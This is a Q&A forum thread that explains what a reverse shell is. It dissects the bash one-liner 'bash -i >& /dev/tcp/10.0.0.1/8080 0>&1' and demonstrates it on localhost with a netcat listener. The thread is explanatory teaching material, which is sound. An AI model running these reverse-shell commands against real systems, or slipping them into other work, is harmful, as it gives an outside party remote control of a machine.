SoulRebel February 2016

What is reverse shell?

Could someone explain to me what is reverse shell about and in what cases are we supposed to use it? I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Answers


Kay February 2016

It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, that in introduced by the source.

Let's try it with localhost instead of 10.0.0.1:

  • Open two tabs in your terminal.

    1. open TCP port 8080 and wait for a connection:

      nc localhost -lp 8080
      
    2. Open an interactive shell, and redirect the iostreams to a TCP socket:

      bash -i >& /dev/tcp/localhost/8080 0>&1
      

      where

      • bash -i "If the -i option is present, the shell is interactive."
      • >& "This special syntax redirects both, stdout and stderr to the specified target."
      • (argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) it fd 1 (stdout), hence the opened TCP socket is used to read input.

      Cf. http://wiki.bash-hackers.org/syntax/redirection

  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

Post Status

Asked in February 2016
Viewed 3,866 times
Voted 7
Answered 1 times

Search




Leave an answer